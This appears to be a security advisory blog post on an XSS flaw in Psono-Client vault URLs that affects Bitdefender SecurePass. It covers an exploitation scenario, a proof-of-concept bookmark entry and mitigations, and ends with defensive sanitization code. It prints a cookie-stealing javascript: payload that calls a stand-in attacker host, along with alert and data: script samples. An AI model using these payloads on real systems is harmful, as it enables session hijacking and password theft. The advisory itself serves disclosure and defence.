Critical XSS Vulnerability in Psono-Client Exposes Bitdefender SecurePass Users to Arbitrary Code Execution


Overview

A critical Cross-Site Scripting (XSS) vulnerability (CVE-2025-1987) has been discovered in Psono-Client, affecting its handling of vault entries, particularly those of type website_password and bookmark. This vulnerability impacts Bitdefender SecurePass, which utilizes Psono-Client for password management.

The flaw stems from improper sanitization of the URL field in vault entries, allowing attackers to inject malicious javascript: URLs. When a user interacts with a compromised entry (e.g., clicking or opening it), the embedded JavaScript executes in the context of the Psono vault, leading to arbitrary code execution and potential data theft.

With a CVSS-B score of 9.3 (CRITICAL), this vulnerability poses a severe risk to organizations and individuals relying on Psono-Client for secure password storage. (Published Date: June 21, 2025).


Technical Details

Root Cause

Psono-Client fails to properly validate and sanitize URLs stored in vault entries. Attackers can craft malicious entries containing JavaScript payloads instead of legitimate web addresses.

Exploitation Scenario

  1. Attack Vector:

    • An attacker creates or modifies a vault entry (e.g., a bookmark or website_password) with a malicious javascript: URL.
    • Example payload:

      javascript:fetch('https://attacker.com/steal?data=' + encodeURIComponent(document.cookie));

    • The attacker may trick a user into importing a malicious vault or exploit a compromised account.

  2. User Interaction:

    • The victim logs into their Psono vault (or Bitdefender SecurePass).
    • They click on the malicious entry, triggering the JavaScript payload.

  3. Impact:

    • The script executes in the Psono vault context, allowing:
      • Session hijacking (stealing cookies/tokens).
      • Exfiltration of stored passwords.
      • Phishing attacks (e.g., displaying fake login prompts).
      • Remote code execution via additional exploits.


Proof of Concept (PoC)

Malicious Bookmark Entry Example

An attacker could inject a payload like this into a vault:

{
  "type": "bookmark",
  "name": "Important Link",
  "url": "javascript:alert('XSS');//"
}

When the victim clicks on "Important Link," an alert box appears, demonstrating arbitrary script execution.

Real-World Attack Scenario

  1. Phishing Campaign:

    • An attacker sends a malicious vault export file to a victim, disguised as a legitimate backup.
    • The victim imports it, unknowingly adding an XSS payload.

  2. Privilege Escalation:

    • If an admin interacts with the malicious entry, the attacker could gain full vault access.


Mitigation & Recommendations

Immediate Actions

  • Update Psono-Client to the latest patched version (if available).
  • Audit vault entries for suspicious javascript: URLs.
  • Disable clickable URLs in vault entries until a fix is deployed.

Long-Term Fixes

  • Input Sanitization: Ensure all URLs are validated and stripped of executable code.
  • Content Security Policy (CSP): Implement strict CSP headers to block inline scripts.
  • User Education: Warn users against importing untrusted vault backups.
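As an added example (not Psono's own code) of the input-sanitization fix recommended above: an allow-list URL check in JavaScript, the vulnerable and hardened rendering of a vault entry side by side, and an audit helper for the "audit vault entries" action. The entry shape { type, name, url } follows the PoC; the function names and the sample vault are assumptions.

```javascript
// Added example, not Psono's own code: allow-list URL handling for vault entries
// of the shape shown in the PoC ({ type, name, url }). Runs under Node.js.

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Parse with the WHATWG URL parser, which lowercases the scheme and strips tabs and
// newlines, so "JavaScript:" and "java\tscript:" both normalize to "javascript:".
function parseUrl(raw) {
  if (typeof raw !== 'string') return null;
  try { return new URL(raw); } catch { return null; }
}

// Returns a normalized absolute URL that may be placed in an href, or null.
// Allow-listing schemes (rather than denying "javascript:") also blocks data:, vbscript:, file:.
function safeEntryUrl(raw) {
  const u = parseUrl(raw);
  return u && ALLOWED_PROTOCOLS.has(u.protocol) ? u.href : null;
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: the stored value goes straight into href, so a javascript: URL runs on click.
function renderEntryVulnerable(entry) {
  return `<a href="${entry.url}">${entry.name}</a>`;
}

// Hardened pattern: entries whose URL fails the allow list are rendered as non-clickable text.
function renderEntryHardened(entry) {
  const url = safeEntryUrl(entry.url);
  const label = escapeHtml(entry.name);
  return url
    ? `<a href="${escapeHtml(url)}" rel="noopener noreferrer">${label}</a>`
    : `<span>${label}</span>`;
}

// Audit helper: entries whose URL parses with an explicit scheme outside the allow list.
// Scheme-less values such as "example.com" do not parse as absolute URLs and are not flagged.
function findSuspiciousEntries(entries) {
  return entries.filter((e) => {
    const u = parseUrl(e.url);
    return u !== null && !ALLOWED_PROTOCOLS.has(u.protocol);
  });
}

// Constructed sample vault export (not real data) mixing benign and malicious entries.
const SAMPLE_VAULT = [
  { type: 'bookmark', name: 'Important Link', url: "javascript:alert('XSS');//" },
  { type: 'website_password', name: 'Mail', url: 'https://mail.example.com/login' },
  { type: 'bookmark', name: 'Notes', url: 'data:text/html,<script>alert(1)</script>' },
];
```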


Conclusion

CVE-2025-1987 is a severe XSS vulnerability that could allow attackers to compromise password vaults and steal sensitive credentials. Organizations using Psono-Client or Bitdefender SecurePass should apply patches immediately and monitor for suspicious activity.

Stay vigilant and patch promptly to prevent exploitation! 🚨

References

To read the full story of the Psono-Client XSS vulnerability (CVE-2025-1987):

https://cybercase.cyberhat.online/2025/06/cyberhatonline-story-for-xss-attack.html

Crow

physics, information technologies, author, educator
